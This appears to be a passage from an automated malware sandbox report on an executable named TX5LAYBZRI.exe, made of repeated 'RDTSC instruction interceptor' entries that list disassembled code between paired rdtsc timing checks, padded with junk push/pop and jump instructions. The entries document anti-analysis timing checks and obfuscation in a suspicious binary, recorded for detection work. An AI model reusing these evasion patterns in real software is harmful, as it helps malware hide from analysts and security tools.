Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14B891A second address: 14B8923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4AF7 second address: 14A4AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4AFC second address: 14A4B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4BC7 second address: 14A4BCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4BCD second address: 14A4BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A4BD2 second address: 14A4BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF108873976h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A6BB6 second address: 14A6BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A6BBC second address: 14A6BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A6C83 second address: 14A6C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A7EFB second address: 14A7F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A8E93 second address: 14A8E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14A8E97 second address: 14A8EA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF108873978h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14BD208 second address: 14BD20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14BD20C second address: 14BD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14BD2A8 second address: 14BD2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AB037 second address: 14AB03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AB03C second address: 14AB05E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ABF81 second address: 14ABF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14ADFE4 second address: 14ADFF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108C7BF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AE0B6 second address: 14AE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AE0BA second address: 14AE0BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14AE0BE second address: 14AE0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C390C second address: 14C3910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C3910 second address: 14C3916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C3916 second address: 14C3939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF108C7BF12h 0x0000000b pop edi 0x0000000c js 00007FF108C7BF18h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C3939 second address: 14C393D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C393D second address: 14C3941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C26C3 second address: 14C26C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C26C7 second address: 14C26D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C26D3 second address: 14C26D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C2F03 second address: 14C2F22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF108C7BF17h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C3094 second address: 14C309E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF108873976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C336D second address: 14C339C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FF108C7BF06h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF108C7BF18h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C339C second address: 14C33B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Ah 0x00000007 jp 00007FF108873976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14C6400 second address: 14C6410 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF108C7BF06h 0x00000008 jc 00007FF108C7BF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CA2DC second address: 14CA2E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CA2E2 second address: 14CA2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF0B7 second address: 14CF0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF0BB second address: 14CF0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 145436D second address: 1454393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF108873976h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF258 second address: 14CF266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FF108C7BF08h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF266 second address: 14CF2B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 jbe 00007FF108873978h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jne 00007FF108873976h 0x00000019 jmp 00007FF108873981h 0x0000001e jg 00007FF108873976h 0x00000024 popad 0x00000025 jmp 00007FF108873989h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF974 second address: 14CF9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 jng 00007FF108C7BF06h 0x0000000f popad 0x00000010 jno 00007FF108C7BF0Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CF9A6 second address: 14CF9AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14CFF28 second address: 14CFF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF15h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FF108C7BF0Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D46B2 second address: 14D46B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D46B6 second address: 14D46BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14577BE second address: 14577CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF108873976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D34D6 second address: 14D34DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1493A14 second address: 12E09F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2A47h] 0x00000012 mov dword ptr [ebp+122D18CCh], ecx 0x00000018 push dword ptr [ebp+122D0035h] 0x0000001e sub dword ptr [ebp+122D1956h], ebx 0x00000024 call dword ptr [ebp+122D1A23h] 0x0000002a pushad 0x0000002b jmp 00007FF10887397Eh 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 call 00007FF108873980h 0x00000038 mov ebx, dword ptr [ebp+122D2B83h] 0x0000003e pop ecx 0x0000003f jmp 00007FF10887397Dh 0x00000044 popad 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D38B9h], esi 0x0000004f mov dword ptr [ebp+122D28E3h], eax 0x00000055 pushad 0x00000056 mov di, 6547h 0x0000005a mov dword ptr [ebp+122D38B9h], edi 0x00000060 popad 0x00000061 mov esi, 0000003Ch 0x00000066 mov dword ptr [ebp+122D38B9h], esi 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 pushad 0x00000071 mov dword ptr [ebp+122D2DA6h], edi 0x00000077 mov bh, dh 0x00000079 popad 0x0000007a pushad 0x0000007b popad 0x0000007c lodsw 0x0000007e jmp 00007FF108873982h 0x00000083 sub dword ptr [ebp+122D1A06h], edx 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d mov dword ptr [ebp+122D2609h], ebx 0x00000093 mov ebx, dword ptr [esp+24h] 0x00000097 mov dword ptr [ebp+122D2674h], ecx 0x0000009d jmp 00007FF10887397Fh 0x000000a2 nop 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 push ebx 0x000000a6 jno 00007FF108873976h 0x000000ac pop ebx 0x000000ad rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1493BC3 second address: 1493BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1493BC7 second address: 1493BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1493C79 second address: 1493CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], esi 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF108C7BF08h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jnl 00007FF108C7BF24h 0x0000002b nop 0x0000002c ja 00007FF108C7BF2Ah 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1493CF9 second address: 1493CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14943B8 second address: 14943BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14943BC second address: 14943D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14943D5 second address: 14943D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149456E second address: 149457D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149457D second address: 149458F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149458F second address: 1494595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494595 second address: 1494599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494034 second address: 1494038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D3A31 second address: 14D3A3B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D3D75 second address: 14D3DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873980h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF108873987h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D3DA6 second address: 14D3DB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF108C7BF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D40CA second address: 14D40CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D40CE second address: 14D410F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jne 00007FF108C7BF15h 0x00000012 jp 00007FF108C7BF24h 0x00000018 jmp 00007FF108C7BF18h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D410F second address: 14D413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 jmp 00007FF108873984h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108873980h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8C25 second address: 14D8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8D9A second address: 14D8DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8DA0 second address: 14D8DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF108C7BF16h 0x00000011 jmp 00007FF108C7BF0Fh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8F77 second address: 14D8FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FF10887397Ah 0x0000000a jmp 00007FF108873981h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007FF108873982h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FA3 second address: 14D8FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF108C7BF06h 0x0000000a je 00007FF108C7BF0Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FB7 second address: 14D8FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8FBF second address: 14D8FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D920B second address: 14D9219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF108873976h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D9219 second address: 14D9259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FF108C7BF2Ah 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF0Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D97FB second address: 14D9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D9801 second address: 14D980E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FF108C7BF06h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D8661 second address: 14D867A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873985h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D867A second address: 14D867E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14D867E second address: 14D8692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF108873976h 0x0000000e jp 00007FF108873976h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DC273 second address: 14DC27C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DC27C second address: 14DC289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FF10887397Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF497 second address: 14DF49C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF49C second address: 14DF4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DF4A2 second address: 14DF4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF108C7BF17h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FF108C7BF0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DECF1 second address: 14DECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEE82 second address: 14DEE9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF108C7BF06h 0x00000008 jmp 00007FF108C7BF0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14DEE9F second address: 14DEEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108873985h 0x00000009 rdtsc
